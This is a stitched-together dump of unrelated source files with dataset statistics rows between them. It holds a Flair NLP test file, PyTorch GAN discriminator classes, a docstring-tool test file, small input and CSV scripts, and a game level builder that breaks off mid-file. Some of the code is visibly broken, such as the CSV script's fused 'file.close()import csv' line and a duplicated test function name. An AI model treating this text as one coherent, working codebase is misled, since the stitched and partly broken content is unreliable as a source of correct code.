{'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_multi(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'multi'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'entity': 0, 'xpos': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [])])])])
# assert actual == expected, actual
def test_invalid_language(self):
with pytest.raises(TypeError):
FlairPipeline().process(text, lang='martian')
def test_validation(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en'))
class TestFlairEmbeddings(TestCase):
def test_no_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: 'embeddings' not in t, actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_default_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='default', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair glove,multi-forward,multi-backward',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_character_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=True, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,char',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_bpe(self):
actual = FlairPipeline().process(text, lang='en', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,byte-pair_50',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='en', bpe_size=45)
def test_invalid(self):
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='martian', char_embeddings=False, bpe_size=0)
def test_validation_default(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', use_embeddings='default'))
def test_validation_bpe(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', bpe_size=50))
def test_validation_chars(self):
assert validation.is_valid(FlairPipeline.process(text, lang='en', char_embeddings=True))
| 270.039604 | 5,872 | 0.583889 | 3,211 | 27,274 | 4.91716 | 0.067892 | 0.048768 | 0.053645 | 0.105897 | 0.946798 | 0.944455 | 0.928938 | 0.927925 | 0.924504 | 0.918931 | 0 | 0.041962 | 0.125357 | 27,274 | 100 | 5,873 | 272.74 | 0.619912 | 0.844357 | 0 | 0.151515 | 0 | 0.015152 | 0.160275 | 0.008049 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.227273 | false | 0 | 0.090909 | 0 | 0.348485 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
033c545d69902b203a3aed50730c91ccd007e842 | 9,830 | py | Python | models/disc_cnn.py | bmeatayi/neurogan | 310590e648a68f2966312aa0b460908d719e964d | [
"MIT"
] | null | null | null | models/disc_cnn.py | bmeatayi/neurogan | 310590e648a68f2966312aa0b460908d719e964d | [
"MIT"
] | null | null | null | models/disc_cnn.py | bmeatayi/neurogan | 310590e648a68f2966312aa0b460908d719e964d | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
class DiscriminatorCNN_proj(nn.Module):
def __init__(self, nw=40, nh=40, nl=5,
n_filters=(15, 9),
kernel_size=(15, 11),
n_cell=1):
super(DiscriminatorCNN_proj, self).__init__()
self.nW = nw
self.nH = nh
self.nL = nl
self.nFiltL1 = n_filters[0]
self.nFiltL2 = n_filters[1]
self.szFiltL1 = kernel_size[0]
self.szFiltL2 = kernel_size[1]
self.nCell = n_cell
self.l3_filt_shape = None
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nL,
out_channels=self.nFiltL1,
kernel_size=(self.szFiltL1, self.szFiltL1),
stride=1,
padding=0,
bias=True))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nFiltL1,
out_channels=self.nFiltL2,
kernel_size=(self.szFiltL2, self.szFiltL2),
stride=1,
padding=0,
bias=True))
in_shp, conv2outShape = self._compute_fc_in()
self.l3_filt_shape = (self.nCell, *conv2outShape)
self.fc1 = nn.utils.spectral_norm(nn.Linear(in_features=in_shp, out_features=self.nCell, bias=True))
self.fc2 = nn.utils.spectral_norm(nn.Linear(in_features=self.nCell, out_features=64, bias=True))
self.fc3 = nn.utils.spectral_norm(nn.Linear(in_features=64, out_features=1, bias=True))
self.fcSpike1 = nn.utils.spectral_norm(nn.Linear(in_features=self.nCell, out_features=32, bias=True))
self.fcSpike2 = nn.utils.spectral_norm(nn.Linear(in_features=32, out_features=64, bias=True))
self.fcSpike3 = nn.utils.spectral_norm(nn.Linear(in_features=64, out_features=self.nCell, bias=True))
def forward(self, spike, stim):
x_conv = F.relu(self.conv1(stim))
x_conv = F.relu(self.conv2(x_conv))
x_fc1 = F.relu(self.fc1(x_conv.view([x_conv.shape[0], -1])))
x_fc2 = F.relu(self.fc2(x_fc1))
x_sp = F.relu(self.fcSpike1(spike))
x_sp = F.relu(self.fcSpike2(x_sp))
x_sp = F.relu(self.fcSpike3(x_sp))
x = F.relu(self.fc3(x_fc2)) + torch.bmm(x_sp, x_fc1.unsqueeze(2)).squeeze(2)
return x
def _compute_fc_in(self):
x = np.random.random([1, self.nL, self.nW, self.nH])
x = torch.from_numpy(x)
x = self.conv1(x.float())
x = self.conv2(x)
conv2shape = x.size()[1:]
x = x.view(x.size(0), -1)
return x.size(1), conv2shape
class DiscriminatorCNN(nn.Module):
def __init__(self, nw=40, nh=40, nl=5,
n_filters=(15, 9),
kernel_size=(15, 11),
n_cell=1, spectral_norm=True,
mid_act_func=nn.LeakyReLU(0.2, inplace=True),
n_units=[128, 256, 512, 256, 128],
p_drop=None):
super(DiscriminatorCNN, self).__init__()
self.nW = nw
self.nH = nh
self.nL = nl
self.nFiltL1 = n_filters[0]
self.nFiltL2 = n_filters[1]
self.szFiltL1 = kernel_size[0]
self.szFiltL2 = kernel_size[1]
self.nCell = n_cell
self.l3_filt_shape = None
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nL,
out_channels=self.nFiltL1,
kernel_size=(self.szFiltL1, self.szFiltL1),
stride=1,
padding=0,
bias=True))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nFiltL1,
out_channels=self.nFiltL2,
kernel_size=(self.szFiltL2, self.szFiltL2),
stride=1,
padding=0,
bias=True))
if torch.cuda.is_available():
self.cuda()
in_shp, conv2outShape = self._compute_fc_in()
self.l3_filt_shape = (self.nCell, *conv2outShape)
dense_layers = OrderedDict()
if spectral_norm:
dense_layers['fcin'] = nn.utils.spectral_norm(nn.Linear(in_shp+self.nCell, n_units[0]))
else:
dense_layers['fcin'] = nn.Linear(in_shp+self.nCell, n_units[0])
dense_layers['act0'] = mid_act_func
for i in range(1, len(n_units)):
if spectral_norm:
dense_layers['fc' + str(i)] = nn.utils.spectral_norm(nn.Linear(n_units[i - 1], n_units[i]))
else:
dense_layers['fc' + str(i)] = nn.Linear(n_units[i - 1], n_units[i])
if p_drop is not None:
dense_layers['dropout' + str(i)] = nn.Dropout(p_drop)
dense_layers['act' + str(i)] = mid_act_func
if spectral_norm:
dense_layers['fcout'] = nn.utils.spectral_norm(nn.Linear(n_units[-1], 1))
else:
dense_layers['fcout'] = nn.Linear(n_units[-1], 1)
self.dense_layers = nn.Sequential(dense_layers)
def forward(self, spike, stim):
x_conv = F.relu(self.conv1(stim))
x_conv = F.relu(self.conv2(x_conv))
x = self.dense_layers(torch.cat((x_conv.view([x_conv.shape[0], -1]), spike.view(spike.size(0), -1)),dim=1))
return x
def _compute_fc_in(self):
x = np.random.random([1, self.nL, self.nW, self.nH])
x = torch.tensor(x)
x = self.conv1(x)
x = self.conv2(x)
conv2shape = x.size()[1:]
x = x.view(x.size(0), -1)
return x.size(1), conv2shape
class DiscriminatorCNN_deep(nn.Module):
def __init__(self, nw=40, nh=40, nl=5,
n_filters=(15, 9),
kernel_size=(15, 11),
n_cell=1, spectral_norm=True,
mid_act_func=nn.LeakyReLU(0.2, inplace=True),
n_units=[128, 256, 512, 256, 128],
p_drop=None):
super(DiscriminatorCNN_deep, self).__init__()
self.nW = nw
self.nH = nh
self.nL = nl
self.nFiltL1 = n_filters[0]
self.nFiltL2 = n_filters[1]
self.szFiltL1 = kernel_size[0]
self.szFiltL2 = kernel_size[1]
self.nCell = n_cell
self.l3_filt_shape = None
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nL,
out_channels=self.nFiltL1,
kernel_size=(self.szFiltL1, self.szFiltL1),
stride=1,
padding=0,
bias=True))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nFiltL1,
out_channels=self.nFiltL2,
kernel_size=(self.szFiltL2, self.szFiltL2),
stride=1,
padding=0,
bias=True))
if torch.cuda.is_available():
self.cuda()
in_shp, conv2outShape = self._compute_fc_in()
self.l3_filt_shape = (self.nCell, *conv2outShape)
dense_layers = OrderedDict()
if spectral_norm:
dense_layers['fcin'] = nn.utils.spectral_norm(nn.Linear(in_shp+self.nCell, n_units[0]))
else:
dense_layers['fcin'] = nn.Linear(in_shp+self.nCell, n_units[0])
dense_layers['act0'] = mid_act_func
for i in range(1, len(n_units)):
if spectral_norm:
dense_layers['fc' + str(i)] = nn.utils.spectral_norm(nn.Linear(n_units[i - 1], n_units[i]))
else:
dense_layers['fc' + str(i)] = nn.Linear(n_units[i - 1], n_units[i])
if p_drop is not None:
dense_layers['dropout' + str(i)] = nn.Dropout(p_drop)
dense_layers['act' + str(i)] = mid_act_func
if spectral_norm:
dense_layers['fcout'] = nn.utils.spectral_norm(nn.Linear(n_units[-1], 1))
else:
dense_layers['fcout'] = nn.Linear(n_units[-1], 1)
self.dense_layers = nn.Sequential(dense_layers)
def forward(self, spike, stim):
x_conv = F.relu(self.conv1(stim))
x_conv = F.relu(self.conv2(x_conv))
x = self.dense_layers(torch.cat((x_conv.view([x_conv.shape[0], -1]), spike.view(spike.size(0), -1)),dim=1))
return x
def _compute_fc_in(self):
x = np.random.random([1, self.nL, self.nW, self.nH])
x = torch.tensor(x)
x = self.conv1(x.float())
x = self.conv2(x)
conv2shape = x.size()[1:]
x = x.view(x.size(0), -1)
return x.size(1), conv2shape
if __name__ == '__main__':
d = DiscriminatorCNN(n_cell=8)
stim = torch.rand(10, 5, 40, 40)
spike = torch.randn(10, 8)
out = d(spike, stim)
assert out.shape == (10, 1), "Error in the output shape"
| 41.652542 | 115 | 0.504476 | 1,215 | 9,830 | 3.877366 | 0.106996 | 0.066228 | 0.057313 | 0.072596 | 0.897049 | 0.889408 | 0.871577 | 0.871577 | 0.851412 | 0.851412 | 0 | 0.043294 | 0.377314 | 9,830 | 235 | 116 | 41.829787 | 0.726352 | 0 | 0 | 0.836735 | 0 | 0 | 0.010682 | 0 | 0 | 0 | 0 | 0 | 0.005102 | 1 | 0.045918 | false | 0 | 0.02551 | 0 | 0.117347 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
036b806eecbddaf1a2fc7282261425154f086732 | 88 | py | Python | codeabbey/ejerciciospracticepython/ejercicio3udemy.py | rubyal/calculadora | f86a106651816efb18d94acf58160721d350ee7d | [
"Unlicense"
] | null | null | null | codeabbey/ejerciciospracticepython/ejercicio3udemy.py | rubyal/calculadora | f86a106651816efb18d94acf58160721d350ee7d | [
"Unlicense"
] | null | null | null | codeabbey/ejerciciospracticepython/ejercicio3udemy.py | rubyal/calculadora | f86a106651816efb18d94acf58160721d350ee7d | [
"Unlicense"
] | null | null | null | print("Hello " + input("What is your name? "))
print(len(input("what is your name? ")))
| 29.333333 | 46 | 0.636364 | 14 | 88 | 4 | 0.571429 | 0.321429 | 0.392857 | 0.535714 | 0.678571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147727 | 88 | 2 | 47 | 44 | 0.746667 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
30306ade89ff7388017ed85c165c966d7db97b2a | 1,296 | py | Python | npdocstring/tests/test_parse_hint.py | tgy/npdocstring | d885c1eab4ca32941a31e8219dc1b29285d7b2bb | [
"MIT"
] | 1 | 2018-08-20T15:05:29.000Z | 2018-08-20T15:05:29.000Z | npdocstring/tests/test_parse_hint.py | tgy/npdocstring | d885c1eab4ca32941a31e8219dc1b29285d7b2bb | [
"MIT"
] | null | null | null | npdocstring/tests/test_parse_hint.py | tgy/npdocstring | d885c1eab4ca32941a31e8219dc1b29285d7b2bb | [
"MIT"
] | null | null | null | from ..npdocstring import get_funclassdef_nodes, get_function_arguments
def test_parse_nested_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[0])
assert len(args) == 1
assert args[0].hint == "list of list of int"
def test_parse_union_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[1])
assert len(args) == 1
assert args[0].hint == "list of int or str"
def test_parse_complex_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[2])
assert len(args) == 1
assert args[0].hint == "list of list of int or str"
def test_parse_union_hint():
file_content = open("npdocstring/tests/samples/in/hints.py").read()
fcnodes = get_funclassdef_nodes(file_content)
assert len(fcnodes) == 4
args = get_function_arguments(fcnodes[3])
assert len(args) == 1
assert args[0].hint == "int or iterable of int"
| 34.105263 | 71 | 0.708333 | 187 | 1,296 | 4.695187 | 0.208556 | 0.100228 | 0.1082 | 0.08656 | 0.878132 | 0.878132 | 0.878132 | 0.878132 | 0.816629 | 0.816629 | 0 | 0.014856 | 0.168981 | 1,296 | 37 | 72 | 35.027027 | 0.800371 | 0 | 0 | 0.62069 | 0 | 0 | 0.179784 | 0.114198 | 0 | 0 | 0 | 0 | 0.413793 | 1 | 0.137931 | false | 0 | 0.034483 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
305908a5665c4a39d100a6284d538768c0b18165 | 440 | py | Python | csv_reader.py | Gulnaz-Tabassum/hacktoberfest2021 | ffee073f6efa4090244b55966fd69dde51be12f1 | [
"CC0-1.0"
] | 2 | 2021-10-20T13:22:54.000Z | 2021-11-08T09:49:19.000Z | csv_reader.py | Gulnaz-Tabassum/hacktoberfest2021 | ffee073f6efa4090244b55966fd69dde51be12f1 | [
"CC0-1.0"
] | null | null | null | csv_reader.py | Gulnaz-Tabassum/hacktoberfest2021 | ffee073f6efa4090244b55966fd69dde51be12f1 | [
"CC0-1.0"
] | null | null | null | #importing csv
import csv
#opening salary_data.csv from your local computer
file = open("Salary_Data.csv")
csvreader = csv.reader(file)
header = next(csvreader)
print(header)
rows = []
for row in csvreader:
rows.append(row)
print(rows)
file.close()import csv
file = open("Salary_Data.csv")
csvreader = csv.reader(file)
header = next(csvreader)
print(header)
rows = []
for row in csvreader:
rows.append(row)
print(rows)
file.close()
| 20 | 49 | 0.736364 | 66 | 440 | 4.863636 | 0.348485 | 0.093458 | 0.121495 | 0.11215 | 0.778816 | 0.778816 | 0.778816 | 0.778816 | 0.778816 | 0.778816 | 0 | 0 | 0.134091 | 440 | 21 | 50 | 20.952381 | 0.84252 | 0.138636 | 0 | 0.842105 | 0 | 0 | 0.079576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.105263 | null | null | 0.210526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30795d29f300fff36a087b9d125bb2f6d9487c8a | 4,715 | py | Python | utils/scripts/OOOlevelGen/src/daily_levels/181.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/daily_levels/181.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | utils/scripts/OOOlevelGen/src/daily_levels/181.py | fullscreennl/monkeyswipe | c56192e202674dd5ab18023f6cf14cf51e95fbd0 | [
"MIT"
] | null | null | null | import LevelBuilder
from sprites import *
def render(name,bg):
lb = LevelBuilder.LevelBuilder(name+".plist",background=bg)
lb.addObject(Hero.HeroSprite(x=428, y=18,width=32,height=32))
lb.addObject(Beam.BeamSprite(x=101, y=270,width=191,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=319, y=200,width=317,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=129, y=126,width=255,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Beam.BeamSprite(x=303, y=51,width=352,height=1,angle='0',restitution=0.2,static='true',friction=0.5,density=20 ).setName('Beam'))
lb.addObject(Enemy.EnemySprite(x=443, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=391, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=340, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=289, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=238, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=187, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=135, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=33, y=74,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=443, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=391, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=340, y=147,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=443, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=391, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=340, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=289, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=238, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=187, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
lb.addObject(Enemy.EnemySprite(x=84, y=221,width=32,height=32,angle='0',restitution=0.2,static='false',friction=0.5,density=20 ))
